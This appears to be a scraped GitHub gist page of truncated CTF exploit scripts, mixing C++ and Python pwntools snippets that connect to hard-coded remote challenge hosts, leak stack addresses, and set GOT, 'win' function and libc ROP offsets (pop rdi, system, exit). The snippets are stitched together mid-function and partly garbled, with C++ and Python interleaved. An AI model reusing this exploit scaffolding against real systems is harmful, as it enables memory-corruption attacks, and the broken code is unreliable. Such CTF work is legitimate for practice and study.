
Harsh khuha hkraw

#include <pwntools>
#include <string>
#include <vector>
#include <iostream>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// Alternative target: a local ./a.out process (disabled).
//auto io = Process("./a.out");
// File-scope connection object, built from a hard-coded IPv4 address and port.
// NOTE(review): the endpoint is baked into the source; taking host and port from
// the command line would keep the script usable once this address changes.
auto io = Remote("65.1.92.179", 49155);
void add(uint32_t idx, uint32_t size, const std::string& bytes) {
from pwn import *
from time import sleep
def add(index, size, data):
    """Select menu option 1 and supply the index, size and data for a new entry.

    Every value is written with ``sendline``, so each one is followed by a
    newline. Nothing is read back here: the four writes are not synchronised
    with the service's prompts. ``io`` is the connection object defined
    outside this function.
    """
    send = io.sendline
    send("1")          # menu choice
    send(str(index))   # numeric fields go out as decimal text
    send(str(size))
    send(data)
def edit(index,data):
io.sendline("2")
from pwn import *
if __name__ == "__main__":
io = process("./a.out")
io.sendlineafter("age: ","+")
io.sendlineafter("n]: ","y")
io.recvuntil("is ")
stack_leak = int(io.recvuntil(",")[0:-1], 10)
print(f"[+] Stack Leak: {hex(stack_leak)}")
@hkraw
hkraw / fs-2.cc
Created February 21, 2021 06:30
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// File-scope connection object, built from a hard-coded IPv4 address and port.
// NOTE(review): the endpoint is baked into the source; taking host and port from
// the command line would keep the script usable once this address changes.
auto io = Remote("13.233.166.242", 49157);
void add(uint32_t idx, uint32_t size, const std::string &data,
const std::string &s = "\n") {
from pwn import *
def add(idx, size, data, s='\n'):
    """Select menu option 1 and answer its three prompts.

    Waits for the menu text that ends in "exit" followed by ``s`` (a newline
    by default) before sending the choice, then waits for the "index: ",
    "size: " and "input: " prompts in turn. ``data`` is written with
    ``sendafter``, so no newline is appended to it; the other values are
    written with ``sendlineafter``. ``io`` is the connection object defined
    outside this function.
    """
    menu_tail = "exit" + s
    io.sendlineafter(menu_tail, "1")
    io.sendlineafter("index: ", str(idx))
    io.sendlineafter("size: ", str(size))
    # Raw write: the payload is sent exactly as given, without a line terminator.
    io.sendafter("input: ", data)
def edit(idx, data,s="\n"):
io.sendlineafter("exit"+s,"2")
@hkraw
hkraw / fs-1.cc
Created February 20, 2021 20:22
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// Alternative target: a local ./FS-1 process (disabled).
// auto io = Process("./FS-1");
// File-scope connection object, built from a hard-coded IPv4 address and port.
// NOTE(review): the endpoint is baked into the source; taking host and port from
// the command line would keep the script usable once this address changes.
auto io = Remote("13.126.21.122", 49160);
void add(uint32_t idx, uint32_t size, const std::string &data,
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// NOTE(review): going by the names, these are the address of strlen's GOT slot in
// the target binary and strlen's offset inside a libc image. Both values are tied
// to one specific binary and libc build — confirm which before reusing them.
uint64_t strlen_got = 0x409068;
uint64_t libc_strlen = 0x18b660;
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// File-scope connection object, built from a hard-coded host name and port.
auto io = Remote("challenges.ctfd.io", 30458);
// NOTE(review): going by the names, these are absolute addresses in the target
// binary (memset's GOT slot and a function the author calls "win"). Fixed
// addresses like these only hold if the binary loads at a fixed base — confirm.
uint64_t memset_got = 0x404038;
uint64_t win_function = 0x4011C2;
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// Unscoped enumeration with three enumerators; with no explicit initialisers they
// take the values 0, 1 and 2 in declaration order.
enum TYPE { PERSONAL, BUSINESS, ADVERTISEMENT };
class Handle {
public:
#include <iostream>
#include <pwntools>
#include <string>
#include <vector>
// Imports every name from namespace pwn into file scope.
using namespace pwn;
// NOTE(review): the names read like offsets into a libc image (a `pop rdi`
// instruction sequence, system and exit). Such offsets differ between libc
// builds — confirm which build these were taken from.
uint64_t L_pop_rdi = 0x21112;
uint64_t offset_system = 0x453a0;
uint64_t offset_exit = 0x3a040;